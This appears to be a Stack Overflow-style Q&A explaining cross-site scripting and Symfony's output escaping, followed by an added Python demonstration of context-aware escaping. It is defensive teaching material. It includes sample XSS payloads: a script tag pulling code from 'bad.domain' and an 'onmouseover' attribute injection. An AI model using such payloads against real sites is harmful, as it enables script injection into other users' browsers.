To prevent XSS attacks, output escaping has been enabled;

The above is from Symfony, but I don't understand.

A: 

XSS, or Cross Site Scripting is when someone else gets their javascript to be served up by your server. If, for example, you can get random javascript to get served from google.com then you can have that javascript send you everything google knows about the person to whom it's been served.

To avoid this, data that may have come from users (rather than from the server / content author) has angle brackets and other HTML-like stuff escaped so that it won't be executed by end users.

Ry4an
Do you mean by changing `<` to `"` and so on?
You wouldn't change `<` to `"`. You'd change it to `&lt;`.
Anon.
Yes, changing important metacharacters into entities that display the right glyph, but don't have the same processing effects.
Ry4an
+3  A: 

XSS is an abbreviation for "Cross-site scripting". Cross-site scripting attacks occur when you manage to sneak a script (usually javascript) onto someone else's website, where it can run maliciously.

XSS is possible when you have user input into a web site. For instance, if I was filling out a web form, and it asked me for my name, I could enter `My name is <script src="http://bad.domain/evilscript.js"></script>`. If I submit the form, and then on the next page it asks me to confirm my details and re-outputs what I entered, the nasty HTML tag that I entered would get rendered and the script would get downloaded and run by the browser.

In order to prevent this, you need to escape user input. Escaping means that you convert (or mark) key characters of the data to prevent it from being interpreted in a dangerous context. In the case of HTML output, you need to convert the `<` and `>` characters (among others), to prevent any malicious HTML from rendering. Escaping these characters involves turning them into their entity equivalents `&lt;` and `&gt;` (see PHP's `htmlspecialchars()` function), which will not be interpreted as HTML tags by a browser.

What Symfony is trying to tell you is that it has the capability to do this automatically for your output, and that capability is enabled.

zombat
Please also note escaping depends on context. See http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet, especially the XSS prevention rules.
Erlend
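An added example (not from the question, either answer, or Symfony itself) that puts the two points above together: zombat's answer, that escaping turns `<` and `>` into entities so the re-echoed form value no longer renders as a tag, and Erlend's comment, that the escaping has to match the output context. It is written in Python because the standard library's `html.escape()` does the same job as PHP's `htmlspecialchars()`; the name-field payload is the one from the answer above, and the attribute payload, the template strings and all function names are constructed for this illustration.

```python
import html
import json

# Constructed sample input: the value from the answer above, typed into a "name" field.
USER_NAME = 'My name is <script src="http://bad.domain/evilscript.js"></script>'

# Constructed sample input containing no HTML metacharacters at all; entity escaping
# leaves it untouched, which is why the attribute context below still needs quoting.
ATTR_VALUE = 'x onmouseover=alert(1)'


def escape_html_body(value: str) -> str:
    """Escape for HTML element content (the equivalent of htmlspecialchars())."""
    # quote=True also converts " and ' so the same function is safe inside quoted attributes.
    return html.escape(value, quote=True)


def escape_html_attribute(value: str) -> str:
    """Escape for a *quoted* HTML attribute value; same entity set as the body context."""
    return html.escape(value, quote=True)


def escape_js_string(value: str) -> str:
    """Escape for embedding inside a <script> block as a JavaScript string literal.

    Entity escaping is the wrong tool here: the browser does not decode entities inside
    <script>. JSON encoding gives a valid JS literal; '</' is additionally broken up so the
    value can never close the enclosing <script> element, and the two line terminators that
    JSON allows raw but JavaScript does not are escaped as well.
    """
    encoded = json.dumps(value)
    return (encoded.replace("</", "<\\/")
                   .replace("\u2028", "\\u2028")
                   .replace("\u2029", "\\u2029"))


def render_unescaped(name: str) -> str:
    """The confirmation page as described in the answer, with escaping switched off."""
    return f"<p>You entered: {name}</p>"


def render_confirmation(name: str) -> str:
    """The same page with output escaping enabled, as Symfony's message refers to."""
    return f"<p>You entered: {escape_html_body(name)}</p>"


def render_attr_unquoted(value: str) -> str:
    """Escaped, but placed in an unquoted attribute: escaping alone does not help here."""
    return f"<input value={escape_html_attribute(value)}>"


def render_attr_quoted(value: str) -> str:
    """Escaped and placed in a quoted attribute: the value cannot leave the attribute."""
    return f'<input value="{escape_html_attribute(value)}">'


def contains_script_tag(markup: str) -> bool:
    """Crude detection check used to compare the rendered variants: is a real <script> tag present?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_unescaped(USER_NAME))      # a live <script> tag reaches the browser
    print(render_confirmation(USER_NAME))   # &lt;script ...&gt; is displayed as text instead
    print(render_attr_unquoted(ATTR_VALUE)) # onmouseover becomes a separate attribute
    print(render_attr_quoted(ATTR_VALUE))   # the whole string stays inside value="..."
    print(escape_js_string("</script>"))    # "<\/script>", safe inside a <script> block
```

Running the block shows the same input rendered with and without escaping, and the attribute case shows why the OWASP rules insist on quoting attributes even when every value is escaped: `escape_html_attribute(ATTR_VALUE)` returns the input unchanged, so only the surrounding quotes keep it from being parsed as extra attributes.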